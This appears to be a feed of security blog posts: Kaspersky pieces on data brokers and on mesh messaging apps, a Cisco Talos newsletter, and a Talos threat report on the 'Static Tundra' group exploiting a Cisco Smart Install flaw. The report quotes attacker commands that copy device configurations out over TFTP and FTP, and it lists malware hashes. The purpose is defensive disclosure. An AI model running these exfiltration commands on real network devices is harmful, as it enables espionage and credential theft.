Data brokers compile extensive dossiers on you to resell later. They’re interested in all of us — hundreds of millions of folks worldwide — and they don’t ask for our permission or pay us any compensation. Most of these companies aren’t well known, and you’ve likely never had any direct contact with them. But there are around a thousand of them in the U.S. alone, and five times as many worldwide. This market was estimated at nearly $300 billion last year. Data brokers’ clients include banks checking credit history, retailers looking for new customers, intelligence agencies, and many other organizations that need detailed data on individuals.

What do data brokers collect, and where from?

Data brokers collect anything and everything they can get their hands on. Most often:

• Personal information: full names, physical addresses, dates of birth, phone numbers, email addresses, identification numbers (passports, driver’s licenses, social security numbers, etc.)
• Age, gender, origin, marital and financial status, level and type of education
• Number and type of pets
• Car make and mileage
• Geolocation data: likely places of work and residence, favorite stores, entertainment spots
• Details on online and offline purchases, membership in retailer loyalty programs, favorite brands
• Detailed financial information: creditworthiness, number and types of accounts, deposits, investments, mortgages, credit card habits, bankruptcy data
• Online behavior data: favorite websites, types of content frequently viewed on social media, hobbies, recently viewed ads, etc.

• Health information, including data on medication purchases, online symptom searches, data from fitness apps
• Habits, interests, political and religious beliefs, favorite media outlets
• Social connections: family members, coworkers, friends

To compile such an intimidatingly detailed file, brokers download any publicly available data (social media profiles, business registries, real estate registries, online classified ads), request information from credit bureaus, and buy data from each other. They also purchase data from loyalty programs, and analytics from gadget vendors. And they collaborate with online advertising and tracking firms — especially those that place ads in mobile apps.

All this information is cross-referenced using recurring identifiers (email addresses, phone numbers, names and addresses, ID numbers) to enrich each profile.

What’s so bad about data collection?

Collected and resold data has an invisible yet significant impact on your life. Why were you denied a loan, or why did your insurance premium go up? How come real estate agents have your phone number when you only decided to buy a house yesterday? According to a U.S. Senate committee investigation, some data brokers’ collections are clearly designed to exploit people’s difficult circumstances. The names of these datasets speak for themselves: “Rural and Barely Making It”, “Retiring on Empty: Singles”, and “Tough Start: Young Single Parents”. Information like this is often purchased by payday loan providers. Other collections are ominously named too, such as “Individuals who recently visited abortion clinics”.

In an extreme example from 2025, a killer bought data on victims’ residential addresses from publicly available data broker websites to track and assassinate political targets in the U.S.

The same Senate investigation highlights that brokers usually operate in secrecy. They collect data without directly interacting with consumers, often hide their data sources, and prohibit their buyers from revealing where contact lists were obtained.

Note that data brokers, like any other companies, are vulnerable to cyberattacks. When they’re breached, the data they’ve collected falls into the hands of true cybercriminals. The scale of the consequences for victims of a data breach can be illustrated with just one case: last year, hackers stole a database containing 2.7 billion records from a company named National Public Data. The records included full names, addresses, dates of birth, phone numbers, and social security numbers (SSNs). It’s believed that the breach affected every US citizen or resident with an SSN!

The challenges of getting your data removed

While the world is gradually introducing legislation to force data brokers to comply with user requests to find and remove personal information, the process can be quite challenging in practice.

• There’s no centralization. You have to search for your own data on each data broker’s website and make separate removal requests.
• Even locating data brokers — not to mention the page on their website where you can make a request — can be fraught with difficulty. According to a recent study by The Markup, in California alone — where local legislation mandates centralized registration of data brokers and requires data removal upon a user request under the CCPA — 35 out of 499 registered data brokers prohibited search engines from indexing and displaying their data removal pages. The removal link itself is often buried deep in the website’s footer or elsewhere (in one case it was found on page 15 of the privacy policy).
• Information removal requests are often complex and consist of multiple steps. They may even require more personal data from you to prove that you are indeed you, and you have the right to submit a request. A study by UC Irvine highlighted some exotic methods of identity verification, such as providing your zodiac sign or your monthly car loan payment amount. If the request isn’t worded correctly or the verification data isn’t provided, the request is ignored.
• The same study found that, out of 454 information removal requests submitted, 195 (43%) were ignored.

How to actually remove yourself from data brokers’ databases

If you’re up for a challenge, arm yourself with both patience and a spreadsheet (in Excel or similar), and follow our instructions:

• First, identify the data brokers you want to contact. You can find a full up-to-date list from the Privacy Rights Clearinghouse, but it’s heavily focused on U.S.-based companies. While they’re the biggest players in the market, be sure to find brokers specific to your region as well.
• Create and save a standard template for your removal request email. The message should include your key personal details and reference the applicable laws in your case: CCPA for California residents; GDPR for the EU; UK-GDPR for the UK; LGPD for Brazil; 152-FZ for Russia. Even if you don’t live in one of these regions, you can still reference CCPA or GDPR — some providers will honor the request without verifying if the law directly applies to you.
• For each data broker, locate the page for submitting a request, which might be named “Opt Out”, “Do Not Sell”, “Privacy Request”, “Right to Delete”, “Right to Be Forgotten”, or something along those lines. Your best bet is to start by looking for small-print links in the footer of the web page. If you can’t find anything there, check the privacy policy section. You can also try a Google search.
• Carefully review the broker’s specific requirements. If they require you to send a request via email, simply send your template to the provided address. If an online form is required, fill in the fields using snippets from the same template.
• In your spreadsheet, indicate the name of the broker, the date you submitted the request, and the URL of the request page (so you don’t have to search for it again).
• Be patient — a response (if you get one at all) could take up to six weeks. This is where your spreadsheet comes in handy — you can use it to track response times and send follow-up requests as needed.
• For those who lack the time or patience, there are paid services that can automatically send these requests for you.
• Most importantly, this isn’t a one-time process. Data about you is constantly being collected and sold to brokers, so you should go through the same list again every three to six months.

How to stay off data brokers’ lists in the first place

It’s near impossible to avoid getting noticed by data brokers altogether, but you can minimize the amount of data they collect.

• Use multiple email addresses and phone numbers. One for communicating with friends, family, banks, and government agencies. A different one for online stores and non-essential services. You can even use more than two email addresses.
• Provide minimal information to loyalty programs.
• Go through the settings in your online banking apps and on your favorite e-commerce sites. Make sure you’ve turned off all permissions in sections like “Marketing Data”, “Advertising Preferences”, and “Partner Offers”. Feeding data to brokers is often disguised under phrases like “Show me ads based on my interests”.
• Turn off and reset advertising IDs on your smartphone.
• Disable location tracking for most of your apps.
• Use the privacy settings in social networks and messaging apps.
• Use a private browser or an app that protects against online tracking. Special privacy features are available in Kaspersky Premium.
• Take advantage of our free Privacy Checker service to adjust your privacy settings everywhere — from social networks to operating systems.
• Subscribe to our read our Telegram channel to be the first to learn about new threats to your privacy and how to combat them. For example, we’ll soon be publishing detailed instructions on how to minimize and clean up your digital footprint (for both adults and minors).

Other posts about how your personal data is collected and how to fight back:

• How to shrink your digital footprint
• Digital detox: How to take a safe break from screens
• Geolocation data brokers: What they do and what happens when they leak
• How to stop being tracked via Bluetooth beacons like AirTag
• Advertisers sharing data about you with… intelligence agencies
• And others

Kaspersky official blog – ​Read More

Constant access to the internet and a cell service is taken as much for granted these days as electricity, and it’s sometimes hard to imagine how we ever lived without them before. But what if you find yourself in a situation with no mobile internet or cell signal, but you need to stay in touch with friends nearby? For example, your group gets separated on a plane and you’re seated in different sections, but you were all set to discuss your travel plans during the flight. Or you’re at a music festival where the internet is wobbly and it’s too loud to talk, but you still need to coordinate when to head to the main stage.

This is where decentralized p2p (peer-to-peer), or mesh messaging apps can come in handy. These apps allow you to connect multiple devices into a single “mesh” network via Bluetooth or Wi-Fi Direct.

In the 2010s, with the emergence of Wi-Fi Direct, apps like these made a lot of noise, but never really took off — it wasn’t clear what they were for or where you’d even use them. They were an odd substitute for walkie-talkies, but with a shorter range and higher power consumption, so they never became popular with smartphone users. Still, these types of messaging apps are alive and well today, with developers continuing to support them, and even building new ones.

That’s because they serve a key purpose: allowing folks to stay connected during natural disasters, coordinate search party efforts, or simply communicate with neighbors at home or at the summer cottage when there’s no Wi-Fi or cell signal. For these and other similar situations, decentralized messaging apps that don’t require an internet connection are a good, if not perfect, solution.

So, if those walkie-talkies you ordered don’t arrive before your planned hike, mesh messaging apps can step in as a backup.

The term “decentralized” is also often used to describe blockchain messaging apps like Status or Brave Messenger. However, we won’t be talking about them today since they require a stable internet connection to work.

How p2p messaging apps work

These apps work on a decentralized mesh network, where each device serves as both a client and a relay. A distributed network is built up from many client devices, and each member can act as a bridge to pass messages along.

Imagine your smartphone turning into a mini walkie-talkie that can send messages to other nearby devices that have the right app installed. If you want to send a message, it’ll hop from one user’s smartphone to another’s until it reaches the intended recipient. And the devices it passes through can’t read the message as it’s encrypted for connecting nodes.

Devices connect directly with each other via either Bluetooth or Wi-Fi Direct.

Which mesh messaging apps are worth trying?

BitChat. This is the latest decentralized messaging app based on Bluetooth Low Energy (BLE), launched in July 2025 by ex-Twitter (now X) co-founder Jack Dorsey. The app is positioned as a modern, encrypted version of the IRC chats from the late 1990s — and it looks like one too.

It claims to be completely decentralized with no servers and to use end-to-end encryption; messages are broken into 500-byte fragments for smoother transmission. The app requires no sign-up, email, or phone number.

However, security researchers have already found critical vulnerabilities in BitChat, and even call it a victim of “vibe coding” — an AI-driven development technique that omits a proper security audit. Currently, AI-powered tools still struggle with “secure by design”, meaning they have difficulty integrating fundamental security principles at the app’s design phase. Jack Dorsey promises to fix the bugs in upcoming updates.

You can install the messenger from both the App Store and Google Play. The source code is available on GitHub, and you can follow the official releases and updates on Jack Dorsey’s X account.

Bridgefy. This has over 12 million users, which is a lot for a mesh messaging app — the more users there are, the more likely you’ll be able to connect.

Bridgefy also uses BLE, works on both iOS and Android, supports end-to-end encryption, and has two modes: private messaging and public broadcasting. On the downside, the free version is plagued with obtrusive ads, and performance can be patchy.

Briar. This is an open-source, end-to-end encrypted messaging app whose code has passed an independent security audit by Germany’s Cure53.

In addition to working via Bluetooth and Wi-Fi Direct, it can also connect over the internet through the Tor network, which makes it a more versatile tool.

While Briar provides the highest level of privacy and security, there are trade-offs. First, you can only add a contact in person by scanning a QR code or by using special links shared through other channels. Second, forget about voice messages, files, or GIFs — Briar only supports text messaging.

Finally, Briar is only available for Android.

White Mouse. A relatively new project, White Mouse is a chat app with disappearing messages. It’s currently only available for Android, but the developers have promised versions for iOS, macOS, and Windows. It doesn’t require a phone number to sign up, provides end-to-end encryption, doesn’t store messages anywhere, and can automatically delete them. To increase privacy, White Mouse doesn’t allow users to forward messages, take screenshots, or record the screen. It also creates special backgrounds with watermarks to prevent chats from being photographed. It can work both over the internet and directly between nearby devices.

What to bear in mind when using mesh messaging apps

• They aren’t a replacement for centralized messaging apps. Even in an urban environment, sending a message to a friend in the next building over can be a challenge.
• The range is limited by Bluetooth/Wi-Fi power. At least one other user with the same messaging app must be within 100 meters of you in an open area — even closer if there’s no direct line of sight.
• Performance depends on the number of users — the more people using the app, the further a message can travel. A mesh network with enough users can stretch for miles. This means you may have to play the diplomat and convince all your friends to switch from their more user-friendly chat apps.
• Your battery will drain faster with active Bluetooth / Wi-Fi Direct use, so stock up on power banks.
• Not all mesh messaging apps use reliable encryption. Claiming to have it and actually having it aren’t the same thing, so only trust independent researchers and their verification.
• Favor open-source projects, as these allow a wide range of researchers to verify app security.
• Some apps may have vulnerabilities, as the example with BitChat showed. Therefore, it’s not recommended to discuss anything confidential in these apps. And use Kaspersky Premium on your devices to prevent your data from being compromised and to defend against malicious actors.

General tips for using mesh messaging apps

Mesh messaging apps aren’t a replacement for regular messaging apps for daily communication. They’re a tool for special circumstances and should be treated like a first-aid kit, a fire extinguisher, or a life jacket — have one on hand and be glad you normally don’t have to use it.

• Install and set up the app in advance — at the critical moment, you may not have time to figure things out or be able to install the app.
• Make sure your contacts, neighbors, or travel buddies have the same app installed.
• Install several different mesh messaging apps if your lifestyle involves frequent travel or being in places with potential connectivity issues — you never know which one will find a “partner” nearby.
• Before an important event, test the app under conditions similar to what you expect to encounter.
• Have a backup communication plan, such as actual walkie-talkies suited for the specific terrain.

What else to read about messaging app security?

• What makes a messaging app secure?
• Messengers 101: safety and privacy advice
• How to host private videoconferences
• WhatsApp and Telegram account hijacking: How to protect yourself against scams
• Messaging other platforms via WhatsApp: the pros and cons

Kaspersky official blog – ​Read More

(Welcome to this week’s edition of the Threat Source newsletter.) 

Diane, 

2:01 p.m., August 21st. I’ve just returned from a remarkable journey through Seattle and the misty roads of the Olympic Peninsula. If you ever find yourself driving beneath those towering Douglas firs or dragged by your partner through the Twilight Museum in Forks, I recommend stopping for a cup of hot, black coffee and a slice of cherry pie at any roadside diner. It’s nothing short of extraordinary.  

But as I navigated the Rialto Beach tidepools (at 5:30 a.m., no less) and moss-laden trees of the Hoh Rainforest, I made a classic misstep: I forgot to connect to Wi-Fi the entire trip. By the time I returned, my high-speed data allowance had vanished into the mist, leaving me puzzled and restarting my cell phone for days — a humbling reminder that even seasoned agents can overlook the basics. 

Travel is a curious thing, Diane. When you’re on the road, it’s easy to let your guard down, become enchanted by the scenery and forget that digital dangers can lurk behind every public WiFi signal or seemingly harmless USB charging station. 

As the summer draws to a close and more people venture out of Twin Peaks for those last-minute adventures, I’ve compiled a list of field-tested precautions for the journey ahead, because even professionals need a reminder sometimes: 

1. Update your devices and back up important data before you leave. If a device is lost, stolen or infected with malware, you’ll still have access to your files. 
2. Turn off auto-connect features to reduce the risk of connecting to rogue networks or devices. 
3. Only take what you need. The fewer devices you take, the fewer you have to keep track of and worry about. 
4. Limit the use of location services on your devices and apps unless necessary. This protects your privacy and reduces the risk of targeted attacks while traveling. 
5. Steer clear of public computers in hotel lobbies and libraries, especially for accessing sensitive accounts. If you must use them — or if you log in to any streaming services during your stay —  don’t forget to log out of your accounts. 
6. Public WiFi is convenient, but we know its security can be questionable. Use a VPN or your phone’s hotspot for a more secure connection. 
7. Set up device tracking (like Find My iPhone or Find My Device) and know how to remotely wipe your device in case it’s lost or stolen. 
8. Take a power bank with you to avoid using USB charging stations, which could result in malware being downloaded to your device. 

Diane, the woods are lovely, dark and deep, and so are the digital trails we leave behind. Stay vigilant, stay caffeinated and remember that the best protection is awareness. 

Special Agent Dale Cooper

The one big thing 

Static Tundra, a Russian state-backed group, is exploiting end-of-life and unpatched Cisco network devices using a seven-year-old patched vulnerability (CVE-2018-0171) to steal data and maintain long-term hidden access in organizations worldwide. Their tactics include persistent implants and bespoke SNMP tools to exfiltrate data and maintain undetected access, with a focus on entities of strategic interest to the Russian government. We urge immediate patching or disabling of at-risk features to prevent compromise. 

Why do I care? 

If your organization uses Cisco devices that haven’t been patched or replaced, you could be vulnerable to undetected cyberattacks and data breaches—even if the vulnerability is years old. This risk affects organizations of all sizes and industries, putting sensitive data and business operations in jeopardy. 

So now what? 

Immediately review your network infrastructure for unpatched or end-of-life Cisco devices and apply available patches or disable vulnerable features as recommended. Ongoing security hardening, regular updates and vigilant monitoring are critical to defend against this and similar state-sponsored threats.

Top security headlines of the week 

Workday Data Breach Bears Signs of Widespread Salesforce Hack 
Workday said threat actors gained access to a third-party customer relationship management (CRM) system and obtained “commonly available business contact information” such as names, phone numbers, and email addresses. (SecurityWeek) 

Novel 5G Attack Bypasses Need for Malicious Base Station 
A team of researchers from the Singapore University of Technology and Design released a framework named Sni5Gect that can be used to sniff messages and perform message injection in 5G communications. (SecurityWeek) 

Internet-wide Vulnerability Enables Giant DDoS Attacks 
Researchers from Tel Aviv University have identified a way around the Rapid Reset fix called “MadeYouReset,” and it’s raising the possibility that attackers could enact cyberattacks against up to one-third of all websites globally. (Dark Reading) 

Threat Actors Allegedly Listed Windows Zero-Day RCE Exploit For Sale on Dark Web 
The threat actor claims it targets fully updated Windows 10, Windows 11, and Windows Server 2022 systems. The sale conditions emphasize exclusivity, prohibiting resale unless explicitly negotiated, which is typical for premium exploits. (Cybersecurity News) 

XenoRAT malware campaign hits multiple embassies in South Korea  
The targets were generally European embassies in Seoul and the themes included fake meeting invites, official letters, and event invitations, often sent from impersonated diplomats. (BleepingComputer)

Can’t get enough Talos? 

The art of controlling information 
JJ Cummings leads Talos’ Threat Intelligence and Interdiction team on nation-state security and intelligence. He shares his story, thoughts on burnout and motivation, and advice for anyone looking to join Talos.

Ransomware incidents in Japan during the first half of 2025 
In the first half of 2025, the number of ransomware attacks in Japan increased by approximately 1.4 times compared to the previous year. Read our blog to learn the most recent trends.

Cyber Analyst Series: Cybersecurity overview and the role of the cybersecurity analyst 
A series of videos on the profession of cybersecurity analysts made in conjunction with the Ministry of Digital Transformation of Ukraine for Diia.Education (available in English and Ukrainian languages).

Upcoming events where you can find Talos 

• BlueTeamCon (Sept. 4 – 7) Chicago, IL 
• LABScon (Sept. 17 – 20) Scottsdale, AZ 
• VB2025 (Sept. 24 – 26) Berlin, Germany 

Most prevalent malware files from Talos telemetry over the past week

SHA256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca   
MD5: 71fea034b422e4a17ebb06022532fdde    
VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca/details
Typical Filename: VID001.exe    
Claimed Product: N/A    
Detection Name: Coinminer:MBT.26mw.in14.Talos  

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507   
Typical Filename: VID001.exe  
Claimed Product: N/A  
Detection Name: Win.Worm.Coinminer::1201 

SHA 256: 41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610  
MD5: 85bbddc502f7b10871621fd460243fbc   
VirusTotal: https://www.virustotal.com/gui/file/41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610/details  
Typical Filename: N/A  
Claimed Product: Self-extracting archive  
Detection Name: Win.Worm.Bitmin-9847045-0 

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
MD5: 7bdbd180c081fa63ca94f9c22c457376  
VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details  
Typical Filename: IMG001.exe  
Detection Name: Simple_Custom_Detection    

SHA 256: 59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa  
MD5: df11b3105df8d7c70e7b501e210e3cc3  
VirusTotal: https://www.virustotal.com/gui/file/59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa/details  
Typical Filename: DOC001.exe  
Claimed Product: N/A  
Detection Name: Win.Worm.Coinminer::1201 

Cisco Talos Blog – ​Read More

• Static Tundra is a Russian state-sponsored cyber espionage group linked to the FSB’s Center 16 unit that has been operating for over a decade, specializing in compromising network devices for long-term intelligence gathering operations.
• The group actively exploits a seven-year-old vulnerability (CVE-2018-0171), which was patched at the time of the vulnerability publications, in Cisco IOS software’s Smart Install feature, targeting unpatched and end-of-life network devices to steal configuration data and establish persistent access.
• Primary targets include organizations in telecommunications, higher education and manufacturing sectors across North America, Asia, Africa and Europe, with victims selected based on their strategic interest to the Russian government.
• Static Tundra employs sophisticated persistence techniques including the historic SYNful Knock firmware implant (first reported in 2015) and bespoke SNMP tooling to maintain undetected access for multiple years.
• The threat extends beyond Russia’s operations — other state-sponsored actors are likely conducting similar network device compromise campaigns, making comprehensive patching and security hardening critical for all organizations.
• Threat actors will continue to abuse devices which remain unpatched and have Smart Install enabled.
• Customers are urged to apply the patch for CVE-2018-0171 or to disable Smart Install as indicated in the advisory if patching is not an option. Customer support is available if needed by initiating a TAC request.

Since 2015, Cisco Talos has observed the compromise of unpatched and often end-of-life Cisco networking devices by a highly sophisticated threat actor. Based on sufficient recent activity observed through our ongoing analysis, we have designated this threat cluster “Static Tundra.” This blog highlights our observations regarding this threat actor and provides recommendations for detecting and preventing activities associated with Static Tundra.

Threat actor and campaign overview

Talos assesses with high confidence that Static Tundra is a Russian state-sponsored cyber espionage group specializing in network device exploitation to support long-term intrusion campaigns into organizations that are of strategic interest to the Russian government. Static Tundra is likely a sub-cluster of another group, “Energetic Bear” (aka BERSERK BEAR), based on an overlap in tactics, techniques and procedures (TTPs) and victimology, which has been corroborated by the FBI. Energetic Bear was linked to the Russian Federal Security Service’s (FSB) Center 16 unit in a 2022 U.S. Department of Justice indictment. Talos also assesses with moderate confidence that Static Tundra is associated with the historic use of “SYNful Knock,” a malicious implant installed on compromised Cisco devices publicly reported in 2015.

Static Tundra is assessed to be a highly sophisticated cyber threat actor that has operated for over a decade, conducting long-term espionage operations. Static Tundra specializes in network intrusions, demonstrated by the group’s advanced knowledge of network devices and use of bespoke tooling, possibly including the novel, but now decade-old, SYNful Knock router implant.

Static Tundra targets unpatched, and often end-of-life, network devices to establish access on primary targets and support secondary operations against related targets of interest. Once they establish initial access to a network device, Static Tundra will pivot further into the target environment, compromising additional network devices and establishing channels for long-term persistence and information gathering. This is demonstrated by the group’s ability to maintain access in target environments for multiple years without being detected.

For years, Static Tundra has been compromising Cisco devices by exploiting a previously disclosed vulnerability in the Smart Install feature of Cisco IOS software and Cisco IOS XE software (CVE-2018-0171) that has been left unpatched, often after those devices are end-of-life. We assess that the purpose of this campaign is to compromise and extract device configuration information en masse, which can later be leveraged as needed based on then-current strategic goals and interests of the Russian government. This is demonstrated by Static Tundra’s adaptation and shifts in operational focus as Russia’s priorities have changed over time.

Since Static Tundra was first observed in 2015, the group has targeted organizations in the telecommunications, higher education and manufacturing sectors. Victims are primarily based in Ukraine and allied countries, but also include other entities globally. Talos estimates Static Tundra will continue network intrusion campaigns into organizations that are of strategic interest to Russia, specifically manufacturing and higher education, and targets of political interest will likely continue to include Ukraine and its allies.

While this blog focuses on Static Tundra’s ongoing campaign against network devices, many other state-sponsored actors also covet the access these devices afford, as we have warned many times over the years. Organizations should be aware that other advanced persistent threats (APTs) are likely prioritizing carrying out similar operations as well.

Targeting and victimology

Static Tundra has been observed as primarily targeting organizations in the telecommunications, higher education and manufacturing sectors, pivoting over time in alignment with shifts in Russian strategic interests. Known victims span multiple geographic regions, including North America, Asia, Africa and Europe.

One of the clearer targeting shifts we observed was that Static Tundra’s operations against entities in Ukraine escalated at the start of the Russia-Ukraine war, and have remained high since then. Static Tundra was observed compromising Ukrainian organizations in multiple verticals, as opposed to previously more limited, selective compromises typically being associated with this threat actor.

Tactics, techniques and procedures (TTPs)

We assess that Static Tundra’s two primary operational objectives are 1) compromising network devices to gather sensitive device configuration information that can be leveraged to support future operations, and 2) establishing persistent access to network environments to support long-term espionage in alignment with Russian strategic interests. Because of the large global presence of Cisco network infrastructure and the potential access it affords, the group focuses heavily on the exploitation of these devices and possibly also the development of tools to interact with and persist on these devices. Static Tundra utilizes bespoke tooling that prioritizes persistence and stealth to achieve these objectives. The tooling and techniques target old and unpatched edge devices.

Initial access

Since at least 2021, Static Tundra has been observed aggressively exploiting CVE-2018-0171, a known and patched vulnerability in Cisco IOS software and Cisco IOS XE software that could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device.

Cisco issued a patch for CVE-2018-0171 in 2018. As advised previously by Cisco, customers are strongly urged to apply the patch immediately given active and ongoing exploitation of the vulnerability by sophisticated state-sponsored or state-aligned active persistent threat (APT) groups. Devices that are beyond end of life and cannot support the patch require additional security precautions as detailed in the 2018 security advisory. Unpatched devices with Smart Install enabled will continue to be vulnerable to these and other attacks unless and until customers take action.

Talos assesses with moderate confidence that Static Tundra leverages bespoke tooling to automate the exploitation of CVE-2018-0171 and subsequent configuration exfiltration against a predefined set of target IP addresses, likely gathered using publicly available scan data from a service such as Shodan or Censys. The process is similar to those that have been reported publicly in red teaming blogs and similar publications.

After gaining initial entry via exploitation of the Smart Install vulnerability, Static Tundra’s CVE-2018-0171 attack chain continues by issuing a command that will modify the running configuration and enable the local Trivial File Transfer Protocol (TFTP) server:

tftp-server nvram:startup-config

This then allows Static Tundra to make a follow-up connection to the newly spawned TFTP server to retrieve the startup configuration. The extracted configuration may reveal credentials and/or Simple Network Management Protocol (SNMP) community strings that can then be leveraged for more direct access to the system.

Static Tundra has also been observed making initial access to devices via SNMP, leveraging a community string that was either compromised in a previous attack or guessed. In some cases, the group used insecure community strings of “anonymous” and “public” with read-write permissions.

Execution

Upon gaining initial access to a target environment, Static Tundra interacts with the SNMP service using community strings that were compromised during the initial access phase. In some cases, Static Tundra spoofs the source address of the SNMP traffic. This technique allows the threat actor to obfuscate their infrastructure and bypass access control lists (ACLs), as the SNMP protocol does not use session establishment. SNMP offers a variety of options for further execution on a compromised device, such as executing commands directly, modifying the running configuration and extracting the current running configuration or startup configuration.

Static Tundra leverages SNMP to send instructions to download a text file from a remote server and append it to the running configuration. This can allow for additional means of access via newly created local user accounts in conjunction with enabling remote services including TELNET.

Persistence

Due to the relatively static nature of network environments, Static Tundra often relies on compromised SNMP community strings and credentials to maintain access to systems over the course of multiple years. In some cases, Static Tundra creates privileged local user accounts and/or additional SNMP community read-write strings.

Static Tundra has been observed leveraging a Cisco IOS firmware implant known as SYNful Knock to achieve persistent access to compromised systems. SYNful Knock is a modular implant that attackers inject into a Cisco IOS image and then load onto the compromised device. This provides a stealthy means of access that will persist through reboots. Remote access to the device can then be achieved by sending a specifically crafted TCP SYN packet, commonly referred to as a “magic packet.” Additional information, including a full technical write-up, can be found in a 2015 blog published by Mandiant with additional details from a 2015 Cisco blog. Additionally, Talos has published a script that can be used to scan for and detect the SYNful Knock implant.

Defense evasion

Static Tundra has been observed modifying TACACS+ configuration on compromised devices, hindering remote logging capabilities. Static Tundra also modifies access control lists (ACLs) to permit access from specific IP addresses or ranges under their control.

Discovery

Static Tundra likely uses publicly-available scan data from services such as Shodan or Censys to identify systems of interest. Once inside a target environment, Static Tundra relies heavily on native commands, such as “show cdp neighbors”, to reveal additional systems of interest within the target environment. This presents a relatively stealthy way to identify further targets without the need for active scanning.

Collection

One of Static Tundra’s primary actions on objectives is to capture network traffic that would be of value from an intelligence perspective. To achieve this, Static Tundra establishes Generic Routing Encapsulation (GRE) tunnels that redirect traffic of interest to attacker-controlled infrastructure, which can then be captured and further analyzed. Static Tundra has also been observed collecting and exfiltrating NetFlow data on compromised systems, revealing source and destination information on streams of potential interest.

Exfiltration

Static Tundra exfiltrates configuration information through a variety of means, including inbound TFTP connections via the Smart Install exploitation procedure mentioned in the Initial Access section, outbound TFTP or FTP connections from the compromised device to attacker-controlled infrastructure, and inbound SNMP connections using the copy configuration process.

Static Tundra leverages bespoke SNMP tooling and functionality provided by the CISCO-CONFIG-COPY-MIB to exfiltrate configurations from compromised devices via either TFTP or Remote Copy Protocol (RCP).

Static Tundra has been observed using the following commands to exfiltrate configuration files via TFTP and FTP:

do show running-config | redirect tftp://:/conf_bckp
copy running-config ftp://user:pass@/output.txt

Detection

Talos recommends taking the following steps to identify suspicious activity that may be related to this campaign:

• Conduct comprehensive configuration management (including auditing), in line with best practices.
• Conduct comprehensive authentication, authorization and command issuance monitoring.
• Monitor syslog and AAA logs for unusual activity, including a decrease in normal logging events, or a gap in logged activity.
• Monitor your environment for unusual changes in behavior or configuration.
• Profile (fingerprint via NetFlow and port scanning) network devices for a shift in surface view, including new ports opening/closing and traffic to/from (not traversing).
• Where possible, develop NetFlow visibility to identify unusual volumetric changes.
• Look for non-empty or unusually large .bash_history files.

Additional identification and detection can be performed using the Cisco forensic guides.

Preventative measures

The following strong recommendations apply to entities in all sectors.

• Cisco-specific measures
  • Apply the patch for CVE-2018-0171.
    • Disable Smart Install as indicated in the advisory if patching is not an option.
  • Leverage Cisco Hardening Guides when configuring devices.
  • Disable telnet and ensure it is not available on any of the Virtual Teletype (VTY) lines on Cisco devices by configuring all VTY stanzas with “transport input ssh” and “transport output none”.
  • Disable Cisco’s Smart Install service using “no vstack” for any device where application of the available patch for CVE 2018-0171 is infeasible, and develop end-of-life management plans for technology too old to patch.
  • Utilize Type 8 passwords for local account credential configuration.
  • Utilize Type 6 for TACACS+ key configuration.
• General measures
  • Rigorously adhere to security best practices, including updating, access controls, user education and network segmentation.
  • Stay up to date on security advisories from the U.S. government and industry and consider suggested configuration changes to mitigate described issues.
  • Update devices as aggressively as possible. This includes patching current hardware and software against known vulnerabilities and replacing end-of- life hardware and software.
    • Select complex passwords and community strings and avoid default credentials.
  • Use multi-factor authentication (MFA).
  • Encrypt all monitoring and configuration traffic (e.g., SNMPv3, HTTPS, SSH, NETCONF, RESTCONF).
  • Lock down and aggressively monitor credential systems, such as TACACS+ and any jump hosts.
  • Utilize AAA to deny configuration modifications of key device protections (e.g., local accounts, TACACS+, RADIUS).
  • Prevent and monitor for exposure of administrative or unusual interfaces (e.g., SNMP, SSH, HTTP, HTTPS).
  • Disable all non-encrypted web management capabilities.
  • Verify existence and correctness of access control lists for all management protocols (e.g., SNMP, SSH, Netconf, etc.).
  • Store configurations centrally and push to devices. Do NOT allow devices to be the trusted source of truth for their configurations.

Indicators of compromise (IOCs)

Cisco Talos Blog – ​Read More